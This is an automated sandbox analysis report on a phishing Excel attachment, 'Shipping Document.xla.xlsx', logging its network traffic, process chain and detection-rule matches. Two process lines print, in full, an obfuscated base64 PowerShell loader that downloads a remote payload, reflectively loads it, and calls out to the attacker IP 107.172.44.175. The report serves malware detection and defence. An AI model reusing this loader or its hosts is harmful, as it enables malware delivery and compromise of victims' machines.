      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899E4B18 URLDownloadToFileW,5_2_000007FE899E4B18
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CE26E2F.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8894-Connection: Keep-AliveHost: 107.172.44.175If-Range: "10deaf-627cc9922fce5"
      Source: global trafficHTTP traffic detected: GET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1321/CAMRM.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: ljg.cl
      Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/
      Source: mshta.exe, 00000004.00000003.501201143.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503022942.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentireti
      Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/1321/seeth
      Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF
      Source: powershell.exe, 00000005.00000002.529441146.000000000030E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:
      Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFp
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: powershell.exe, 00000005.00000002.534757424.000000001C22D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
      Source: powershell.exe, 00000005.00000002.530318649.0000000003390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: powershell.exe, 00000005.00000002.530318649.0000000001FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.660953442.0000000002462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.572052356.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
      Source: powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/
      Source: powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbC
      Source: powershell.exe, 0000000E.00000002.571567594.0000000000278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_
      Source: powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
      Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.505717437.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000377000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.506606458.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ljg.cl/
      Source: mshta.exe, 00000004.00000002.506567896.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000332000.00000004.00000020.00020000.00000000.sdmp, Shipping Document.xla.xlsx, 02B30000.0.drString found in binary or memory: https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=n
      Source: powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      System Summary

      barindex
      Source: Process Memory Space: powershell.exe PID: 2460, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Shipping Document.xla.xlsxOLE: Microsoft Excel 2007+
      Source: 02B30000.0.drOLE: Microsoft Excel 2007+
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].htaJump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89AB1E3D5_2_000007FE89AB1E3D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89AB00DD5_2_000007FE89AB00DD
      Source: Shipping Document.xla.xlsxOLE indicator, VBA macros: true
      Source: Shipping Document.xla.xlsxStream path 'MBD004A267C/\x1Ole' : https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel_rR9S3.||$' EQkV /uo+A1I*w*B--2b7V<1g=rxm#RZd|Y$>Y8XePl2wv[`6RmnElZSG4913HMpY1ZrE764vcOaExsFL1UMfmCMkz1HFr8FoueZjrSC3pgJsbe3miGxzOfzykydsN2AjfLUe0xVscebC5SJjhMKoZu5Vkda78VokJpRBofsttFaN8NDm0sDpw9vePKnLZ30sr6CX8084SLUv4WMGPhakOtc7xLBuZhRYBmpv4TYtzMp2TcBsxORKKkhIcTpBWbAuyUWe737SF#}(Z~yp_?af
      Source: 02B30000.0.drStream path 'MBD004A267C/\x1Ole' : https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel_rR9S3.||$' EQkV /uo+A1I*w*B--2b7V<1g=rxm#RZd|Y$>Y8XePl2wv[`6RmnElZSG4913HMpY1ZrE764vcOaExsFL1UMfmCMkz1HFr8FoueZjrSC3pgJsbe3miGxzOfzykydsN2AjfLUe0xVscebC5SJjhMKoZu5Vkda78VokJpRBofsttFaN8NDm0sDpw9vePKnLZ30sr6CX8084SLUv4WMGPhakOtc7xLBuZhRYBmpv4TYtzMp2TcBsxORKKkhIcTpBWbAuyUWe737SF#}(Z~yp_?af
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2018
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2458
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2018Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2458Jump to behavior
      Source: Process Memory Space: powershell.exe PID: 2460, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.phis.expl.evad.winXLSX@26/26@7/3
